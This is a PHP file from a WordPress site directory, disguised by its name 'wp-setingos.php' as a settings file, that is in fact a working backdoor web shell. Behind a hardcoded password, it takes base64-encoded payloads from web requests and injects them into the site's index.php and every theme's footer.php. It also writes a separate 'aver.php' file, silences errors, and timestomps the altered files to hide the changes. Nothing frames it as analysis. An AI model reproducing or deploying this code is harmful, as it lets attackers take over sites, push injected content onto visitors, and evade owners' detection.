File: //var/www/babazi.club/root/wp-content/wp-setingos.php
<?php
ini_set('display_errors', 0);
ini_set('display_startup_errors',0);
error_reporting(0);
/*
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value)
{
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
}
*/
$sysPwd="sem2022";
$action='';
$password='';
if(isset($_REQUEST['action']))
{
$action=$_REQUEST['action'];
}
if(isset($_REQUEST['password']))
{
$password=$_REQUEST['password'];
}
if($action==""||$password=="")
{
die('__success__parameters error #1__success__');
}
if($password!=$sysPwd)
{
die('__success__parameters error #2__success__');
}
if($action=='beindex')
{
$aver='';
$fileplus='';
$checkstring='';
if(isset($_REQUEST['aver']))
{
$aver=$_REQUEST['aver'];
$aver=base64_decode($aver);
}
if(isset($_REQUEST['fileplus']))
{
$fileplus=$_REQUEST['fileplus'];
$fileplus=base64_decode($fileplus);
}
if(isset($_REQUEST['checkstring']))
{
$checkstring=$_REQUEST['checkstring'];
$checkstring='<!--'.$checkstring.'-->';
}
if($aver==""||$fileplus==""||$checkstring=="")
{
die('__success__parameters error #3__success__');
}
$rootPath=GetRootPath();
$filePath=$rootPath.'/index.php';
$filePath2=$rootPath.'/backup.txt';
$filePath3=$rootPath.'/aver.php';
if(!file_exists($filePath))
{
die('__success__file-not-exist__success__');
}
chmod($filePath,0777);
$filebody=file_get_contents($filePath);
if(strpos('___'.$filebody,$checkstring)!==false)
{
$arrParts=explode($checkstring,$filebody);
$filebody=$arrParts[count($arrParts)-1];
}
if(strpos('___'.$filebody,$checkstring)===false)
{
$filebody=$fileplus."\r\n".$checkstring.$filebody;
$fp=fopen($filePath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$filebody);
fclose($fp);
$fp=fopen($filePath2,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$filebody);
fclose($fp);
$fp=fopen($filePath3,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$aver);
fclose($fp);
}
$filebody=file_get_contents($filePath);
if(strpos('___'.$filebody,$checkstring)!==false)
{
ModifyTime($rootPath,$filePath);
echo '__success__ok__success__';
exit;
}
else
{
echo '__success__failed__success__';
exit;
}
}
else if($action=='belink')
{
$fileplus='';
$checkstring='';
if(isset($_REQUEST['fileplus']))
{
$fileplus=$_REQUEST['fileplus'];
$fileplus=base64_decode($fileplus);
}
if(isset($_REQUEST['checkstring']))
{
$checkstring=$_REQUEST['checkstring'];
$checkstring='<!--'.$checkstring.'-->';
}
if($fileplus==""||$checkstring=="")
{
die('__success__parameters error #3__success__');
}
$rootPath=GetRootPath();
if(!is_dir($rootPath.'/wp-content/themes'))
{
die('__success__folder themes not exist__success__');
}
$folders= GetFolders($rootPath.'/wp-content/themes',false);
$arrParts=explode("|",$folders);
$result=0;
for($n=0;$n<count($arrParts);$n++)
{
$fileFolder=$arrParts[$n];
$filePath=$fileFolder.'/footer.php';
if(!file_exists($filePath))
{
continue;
}
chmod($filePath,0777);
$filebody=file_get_contents($filePath);
if(strpos('___'.$filebody,'</body>')===false)
{
continue;
}
if(strpos('___'.$filebody,$checkstring)!==false)
{
$arrParts=explode($checkstring,$filebody);
$filebody=$arrParts[0].'</body></html>';
}
if(strpos('___'.$filebody,$checkstring)===false)
{
$filebody=str_replace('</body>',$checkstring."\r\n".$fileplus.'</body>',$filebody);
$fp=fopen($filePath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody));
fwrite($fp,$filebody);
fclose($fp);
}
$filebody=file_get_contents($filePath);
if(strpos('___'.$filebody,$checkstring)!==false)
{
ModifyTime($rootPath,$filePath);
$result++;
}
}
if($result>0)
{
echo '__success__ok-'.$result.'__success__';
exit;
}
else
{
echo '__success__failed__success__';
exit;
}
}
function ModifyTime($dir,$filePath)
{
chmod($filePath,0777);
$randomFile= GetRandomFile($dir);
if(!empty($randomFile)&&$randomFile!=$filePath)
{
$time=filemtime($randomFile);
}
else
{
$time=randomDate('2009-01-01','2019-01-01',false);
}
touch($filePath,$time);
chmod($filePath,0644);
}
function randomDate($begintime, $endtime="", $now = true)
{
$begin = strtotime($begintime);
$end = $endtime == "" ? mktime() : strtotime($endtime);
$timestamp = rand($begin, $end);
return $now ? date("Y-m-d H:i:s", $timestamp) : $timestamp;
}
function GetRootPath()
{
$returnVal='';
$locationUrl=GetLocationURL();
$arrParts=explode("/",$locationUrl);
$prevUrl='';
for($n=0;$n<count($arrParts)-4;$n++)
{
if($n==0)
{
$prevUrl.= '/../';
}
else
{
$prevUrl.= '../';
}
}
$returnVal=realpath(dirname(__FILE__).$prevUrl);
return $returnVal;
}
function GetLocationURL()
{
return is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
}
function GetLocationURLPath()
{
$pageURL = is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$arrParts=explode("/",$pageURL);
$pageURL='';
for($n=0;$n<count($arrParts)-1;$n++)
{
$pageURL.= $arrParts[$n].'/';
}
return $pageURL;
}
function GetFolders($dir,$is_sub)
{
$returnVal='';
$files = array();
$dir_list = scandir($dir);
foreach($dir_list as $file)
{
if($file=='..' || $file=='.')
continue;
if(!is_dir($dir.'/'.$file))
continue;
$returnVal.=$dir.'/'.$file.'|';
if($is_sub)
{
$returnVal.=GetFolders($dir.'/'.$file,false);
}
}
return $returnVal;
}
function GetFiles($dir)
{
$returnVal='';
$files = array();
$dir_list = scandir($dir);
foreach($dir_list as $file)
{
if($file=='..' || $file=='.')
continue;
if(is_dir($dir.'/'.$file))
continue;
if($dir.'/'.$file=='')
continue;
$returnVal.=$dir.'/'.$file.'|';
}
return $returnVal;
}
function GetRandomFile($dir)
{
$files=GetFiles($dir);
$arrParts=explode("|",$files);
$index=mt_rand(0,count($arrParts)-1);
$filePath=$arrParts[$index];
return $filePath;
}
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777);
}
}
function mkdirs($dir)
{
if(!is_dir($dir))
{
if(!mkdirs(dirname($dir)))
{ return false; }
if(!mkdir($dir,0777))
{ return false; }
}
return true;
}
function rmdirs($dir)
{
$d = dir($dir);
while (false !== ($child = $d->read()))
{
if($child != '.' && $child != '..')
{
if(is_dir($dir.'/'.$child))
rmdirs($dir.'/'.$child);
else
unlink($dir.'/'.$child);
}
}
$d->close();
rmdir($dir);
}
function is_https()
{
if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
return 'https://';
} elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
return 'https://';
} elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
return 'https://';
}
return 'http://';
}
function GetHttpPage($url)
{
$output = '';
$time_out = 30;
if (function_exists ( 'curl_init' ))
{
$ch = curl_init ();
curl_setopt($ch, CURLOPT_URL, $url );
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true );
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $time_out );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
$output = curl_exec($ch );
curl_close ($ch);
}
elseif (function_exists ( 'file_get_contents' ))
{
$context = stream_context_create(array('http' => array('timeout' => $time_out)));
$output = file_get_contents ( $url, false, $context);
}
elseif (ini_get ( "allow_url_fopen" ) == "1")
{
$errstr = '';
$errno = '';
$info = parse_url ( $url );
$fp = fsockopen ( $info ["host"], 80, $errno, $errstr, $time_out ) or exit ( $errstr . "--->" . $errno );
$head = "GET " . $info ['path'] . "?" . $info ["query"] . " HTTP/1.1\r\n";
$head .= "Host: " . $info ['host'] . "\r\n";
$head .= "Connection: Close\r\n\r\n";
fwrite($fp, $head);
while ( ! feof ( $fp ) ) {
$output .= fgets ( $fp, 128 );
}
fclose ( $fp );
}
return $output;
}
?>